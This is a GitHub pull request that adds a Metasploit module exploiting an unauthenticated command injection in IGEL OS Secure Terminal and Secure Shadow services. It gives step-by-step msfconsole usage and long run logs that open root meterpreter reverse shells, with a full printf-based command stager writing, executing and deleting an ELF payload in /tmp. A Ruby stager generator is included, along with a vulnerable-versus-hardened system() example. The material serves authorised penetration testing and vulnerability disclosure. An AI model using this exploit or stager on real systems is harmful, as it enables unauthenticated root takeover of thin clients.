
Add module IGEL OS Remote Command Execution #14947

Merged: 10 commits, Apr 30, 2021

Conversation

robvinson (Contributor) wrote:

Vulnerable Application

IGEL OS versions before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a system() call via the Secure Terminal and Secure Shadow services.

This module uses the vulnerability to modify certain systemd limits for the targeted service before transferring the payload; this is done to increase payload transfer throughput and preserve service stability. After exploitation these changes are reverted.

Secure Terminal/telnet_ssl_connector: 30022/tcp
Secure Shadow/vnc_ssl_connector: 5900/tcp

Verification Steps

Download a vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.

Unpack the downloaded zip file and create a VM using the included .iso.

Navigate through the installation menus to install the firmware; reboot when prompted.

After the reboot, work through the presented configuration wizard. In the Activation section use the starter license (selected by default). Skip the ICG Agent Setup. Upon completion the system will reboot again.

Turn on vulnerable services

  1. Click on the launcher menu
  2. Click on the gear icon
  3. Select "Setup" from the Application menu to launch the Setup app
  4. To enable the vulnerable VNC service wrapper: under the configuration menu on the left, navigate to System > Remote Access > Shadow. Ensure "Allow remote shadowing" and "Secure mode" are checked.
  5. To enable the vulnerable terminal wrapper: under the configuration menu on the left, navigate to System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.

Exploitation

  1. start msfconsole
  2. use exploit/linux/misc/igel_command_injection
  3. set RHOST [TARGET IP]
  4. set RPORT [30022 or 5900]
  5. set LHOST [LOCAL IP]
  6. exploit

Misc

To obtain the IGEL's IP address to test against, click the up/down arrows on the right side of the task bar, then click "More Details". A shell is available on a virtual console via Ctrl+Alt+F11; switch back to the GUI with Ctrl+Alt+F1.

This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500 with Metasploit Framework 6.0.31-dev on Kali.

Scenarios

IGEL OS 11.04.130

Targeting the Secure Terminal service (30022/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.224
RHOST => 192.168.120.224
msf6 exploit(linux/misc/igel_command_injection) > check
[*] 192.168.120.224:30022 - The target appears to be vulnerable.
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.service StartLimitBurst
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.224:30022 - Writing payload to file /tmp/CPr9.
[*] 192.168.120.224:30022 - Executing payload /tmp/CPr9.
[*] 192.168.120.224:30022 - Removing payload file /tmp/CPr9.
[*] Sending stage (39324 bytes) to 192.168.120.224
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.224:48130) at 2021-03-25 12:29:45 -0400
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.service
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.socket

meterpreter > getuid
Server username: root
meterpreter > 

IGEL OS 10.05.500

Targeting the Secure Shadowing service (5900/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.226
RHOST => 192.168.120.226
msf6 exploit(linux/misc/igel_command_injection) > set RPORT 5900
RPORT => 5900
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.service StartLimitBurst
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.226:5900 - Writing payload to file /tmp/lSmU.
[*] 192.168.120.226:5900 - Executing payload /tmp/lSmU.
[*] 192.168.120.226:5900 - Removing payload file /tmp/lSmU.
[*] Sending stage (39328 bytes) to 192.168.120.226
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.service
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.socket
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.226:55144) at 2021-03-25 12:48:34 -0400

meterpreter > getuid
Server username: root
meterpreter > 
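An added example, not IGEL's code and not part of this pull request, of the bug class the description above refers to: attacker-controlled text reaching a system()-style shell call. It shows the vulnerable pattern beside the three fixes a native daemon would apply in the same way (argv/execve form with no shell, correct quoting, allowlist validation). The field value, the printf command template and the SAFE_FIELD pattern are constructed for the demo and say nothing about which IGEL field is actually injectable.

```ruby
require "open3"
require "shellwords"

# Constructed client-supplied field. A real service would read it off the
# socket; here it closes the template's quote and appends its own commands.
INJECTED_FIELD = "x'; echo INJECTED; echo '"

# Vulnerable: the field is interpolated into a shell command string. Open3
# with a single string runs it through /bin/sh -c, exactly like system(3).
# Wrapping the field in single quotes does not help once the field itself
# contains a quote.
def vulnerable_handler(field)
  out, _status = Open3.capture2("printf '%s\\n' '#{field}'")
  out
end

# Fix 1 (preferred): argv form. No shell is involved, so the field is an
# argument of printf and can never become a command. In C this is the
# execve(2)/posix_spawn(3) replacement for system(3).
def hardened_argv_handler(field)
  out, _status = Open3.capture2("printf", "%s\n", field)
  out
end

# Fix 2: if a shell string is unavoidable, escape every untrusted word with a
# correct quoting routine (Shellwords.escape here) instead of hand-written quotes.
def hardened_quoted_handler(field)
  out, _status = Open3.capture2("printf '%s\\n' #{Shellwords.escape(field)}")
  out
end

# Fix 3: allowlist validation before the value goes anywhere near a shell.
# The pattern is an assumption for the demo (hostname-like values).
SAFE_FIELD = /\A[A-Za-z0-9._-]{1,64}\z/

def validated?(field)
  SAFE_FIELD.match?(field)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{vulnerable_handler(INJECTED_FIELD).inspect}"
  puts "argv form:  #{hardened_argv_handler(INJECTED_FIELD).inspect}"
  puts "quoted:     #{hardened_quoted_handler(INJECTED_FIELD).inspect}"
  puts "validated?: #{validated?(INJECTED_FIELD)}"
end
```

The vulnerable handler emits the injected "INJECTED" line because the shell parsed the field; both hardened handlers print the field back verbatim, one newline-terminated string, with no second command executed.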

@gwillcox-r7 gwillcox-r7 added module needs-linting The module needs additional work to pass our automated linting rules labels Mar 25, 2021
label-actions bot commented Mar 25, 2021:

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

gwillcox-r7 (Contributor) commented:

Please also run tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/misc/igel_command_injection.md and fix as many of the errors reported as possible (don't worry about any line length errors if it's a link though).

@bcoles bcoles removed the needs-linting The module needs additional work to pass our automated linting rules label Mar 25, 2021
@space-r7 space-r7 self-assigned this Apr 1, 2021
space-r7 (Contributor) left a review comment:

Hi, thank you for the module! I left a few comments, mostly related to stylistic changes and leveraging some of Framework's mixins. Please let me know if you have any questions. Thanks!

Six inline review comments on modules/exploits/linux/misc/igel_command_injection.rb (outdated, resolved).
robvinson and others added 6 commits April 9, 2021 09:16
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
- had to switch away from python payload to appease CmdStager
- removed systemd service adjustments preferring to use sleep to avoid rate limits
- updated check function to accommodate more current vulnerable version information in vendor advisory
space-r7 (Contributor) commented:

Retested and the changes worked great. Thanks so much!

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(linux/misc/igel_command_injection) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/misc/igel_command_injection) > set verbose true
verbose => true
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.133:30022 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.37.133:30022 - IGEL OS Version: 11.04.130.01
[+] 192.168.37.133:30022 - The target appears to be vulnerable.
[*] 192.168.37.133:30022 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0'>>/tmp/oNwdw", "printf '\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\355\\0\\0\\0\\206\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\2\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\2'>>/tmp/oNwdw", "printf '\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150'>>/tmp/oNwdw", "printf '\\300\\250\\45\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152'>>/tmp/oNwdw", "printf '\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300'>>/tmp/oNwdw", "printf '\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/oNwdw", "chmod +x /tmp/oNwdw", "/tmp/oNwdw", "rm -f /tmp/oNwdw"]
[*] 192.168.37.133:30022 - executing: printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  16.45% done (149/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\0\0\0\0\0\200\4\10\0\200\4\10\355\0\0\0\206\1\0\0\7\0\0\0\0\20\0\0\152\2\130\315\200\205\300\164\6\61\300\260\1\315\200\152\2'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  32.67% done (296/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\130\315\200\205\300\164\6\61\300\260\1\315\200\152\12\136\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  49.01% done (444/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\300\250\45\1\150\2\0\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\205\300\171\31\116\164\75\150\242\0\0\0\130\152'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  65.45% done (593/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\0\152\5\211\343\61\311\315\200\205\300\171\275\353\47\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\205\300'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  81.79% done (741/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\170\20\133\211\341\231\262\152\260\3\315\200\205\300\170\2\377\341\270\1\0\0\0\273\1\0\0\0\315\200'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  95.03% done (861/906 bytes)
[*] 192.168.37.133:30022 - executing: chmod +x /tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  97.13% done (880/906 bytes)
[*] 192.168.37.133:30022 - executing: /tmp/oNwdw
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:50500) at 2021-04-30 15:33:12 -0500
[*] 192.168.37.133:30022 - Command Stager progress -  98.23% done (890/906 bytes)
[*] 192.168.37.133:30022 - executing: rm -f /tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress - 100.00% done (906/906 bytes)

meterpreter > getuid
Server username: root @ ITC000C29EB2C06 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : ITC000C29EB2C06.LOCALDOMAIN
OS           : IGEL V11 (Linux 5.4.48)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/misc/igel_command_injection) > edit
msf6 exploit(linux/misc/igel_command_injection) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Secure Terminal Service
   1   Secure Shadow Service


msf6 exploit(linux/misc/igel_command_injection) > set target 1
target => 1
msf6 exploit(linux/misc/igel_command_injection) > options

Module options (exploit/linux/misc/igel_command_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    5900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Secure Shadow Service


msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.133:5900 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.37.133:5900 - IGEL OS Version: 11.04.130.01
[+] 192.168.37.133:5900 - The target appears to be vulnerable.
[*] 192.168.37.133:5900 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0'>>/tmp/SVRVj", "printf '\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\355\\0\\0\\0\\206\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\2\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\2'>>/tmp/SVRVj", "printf '\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150'>>/tmp/SVRVj", "printf '\\300\\250\\45\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152'>>/tmp/SVRVj", "printf '\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300'>>/tmp/SVRVj", "printf '\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/SVRVj", "chmod +x /tmp/SVRVj", "/tmp/SVRVj", "rm -f /tmp/SVRVj"]
[*] 192.168.37.133:5900 - executing: printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  16.45% done (149/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\0\0\0\0\0\200\4\10\0\200\4\10\355\0\0\0\206\1\0\0\7\0\0\0\0\20\0\0\152\2\130\315\200\205\300\164\6\61\300\260\1\315\200\152\2'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  32.67% done (296/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\130\315\200\205\300\164\6\61\300\260\1\315\200\152\12\136\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  49.01% done (444/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\300\250\45\1\150\2\0\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\205\300\171\31\116\164\75\150\242\0\0\0\130\152'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  65.45% done (593/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\0\152\5\211\343\61\311\315\200\205\300\171\275\353\47\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\205\300'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  81.79% done (741/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\170\20\133\211\341\231\262\152\260\3\315\200\205\300\170\2\377\341\270\1\0\0\0\273\1\0\0\0\315\200'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  95.03% done (861/906 bytes)
[*] 192.168.37.133:5900 - executing: chmod +x /tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  97.13% done (880/906 bytes)
[*] 192.168.37.133:5900 - executing: /tmp/SVRVj
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.133
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.133:50502) at 2021-04-30 15:34:22 -0500
[*] 192.168.37.133:5900 - Command Stager progress -  98.23% done (890/906 bytes)
[*] 192.168.37.133:5900 - executing: rm -f /tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress - 100.00% done (906/906 bytes)

meterpreter > getuid
Server username: root @ ITC000C29EB2C06 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : ITC000C29EB2C06.LOCALDOMAIN
OS           : IGEL V11 (Linux 5.4.48)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

I went ahead and added the AutoCheck mixin to the module and updated the docs with the new module output.
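An added example, not Metasploit's CmdStager implementation and not part of this pull request, that rebuilds the stager pattern visible in the verbose output above: the payload is octal-escaped one byte at a time into printf commands that append to a temporary file, followed by chmod +x, execution and rm -f, plus a decoder that confirms the round trip. The SAMPLE_ELF bytes are a constructed stand-in (ELF magic plus bytes that exercise the awkward cases), and the /tmp/stage path and 150-byte per-command budget are assumptions for the demo, not values taken from the module.

```ruby
# Constructed stand-in for an ELF payload: the ELF magic, then NUL, '%',
# a single quote, a backslash and 0xff, then every byte value once.
SAMPLE_ELF = ("\x7fELF\x01\x01\x01\x00".b +
              "\x00%'\\\xff".b +
              (0..255).to_a.pack("C*")).b

# One escape per byte with no leading zeros, matching the output above.
# Because every byte is escaped, no raw digit ever follows an escape, so
# printf's "up to three octal digits" rule cannot merge two bytes. The
# escape is resolved by printf as an output character, so a '%' byte (\45)
# is not re-parsed as a conversion specifier.
def octal_escape(byte)
  "\\#{byte.to_s(8)}"
end

# Split the payload into printf commands that each fit within max_cmd
# characters, then append the chmod/execute/cleanup commands.
def build_stager(payload, path: "/tmp/stage", max_cmd: 150)
  prefix = "printf '"
  suffix = "'>>#{path}"
  budget = max_cmd - prefix.length - suffix.length
  raise ArgumentError, "max_cmd too small for path #{path}" if budget < 4

  chunks = []
  cur = +""
  payload.each_byte do |b|
    esc = octal_escape(b)
    if cur.length + esc.length > budget
      chunks << cur
      cur = +""
    end
    cur << esc
  end
  chunks << cur unless cur.empty?

  chunks.map { |c| "#{prefix}#{c}#{suffix}" } +
    ["chmod +x #{path}", path, "rm -f #{path}"]
end

# Reassemble the bytes a target shell would have written, to verify the
# encoding. Non-printf commands (chmod, exec, rm) are skipped.
def decode_stager(cmds)
  out = "".b
  cmds.each do |cmd|
    body = cmd[/\Aprintf '([\\0-7]*)'>>/, 1]
    next unless body
    body.scan(/\\([0-7]{1,3})/) { |(oct)| out << oct.to_i(8).chr }
  end
  out
end

if __FILE__ == $PROGRAM_NAME
  cmds = build_stager(SAMPLE_ELF, path: "/tmp/stage")
  cmds.each { |c| puts c }
  puts "round trip ok: #{decode_stager(cmds) == SAMPLE_ELF}"
end
```

Each generated command is delivered over its own connection, and because the IGEL connector is a socket-activated systemd unit, a burst of connections can trip the service's StartLimitBurst and the socket's TriggerLimitBurst (the limits the first revision of this module overrode and then restored); the merged module instead sleeps between commands to stay under them.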

space-r7 added a commit that referenced this pull request Apr 30, 2021
@space-r7 space-r7 merged commit 41fe164 into rapid7:master Apr 30, 2021
space-r7 commented Apr 30, 2021:

Release Notes

New module exploits/linux/misc/igel_command_injection exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 30, 2021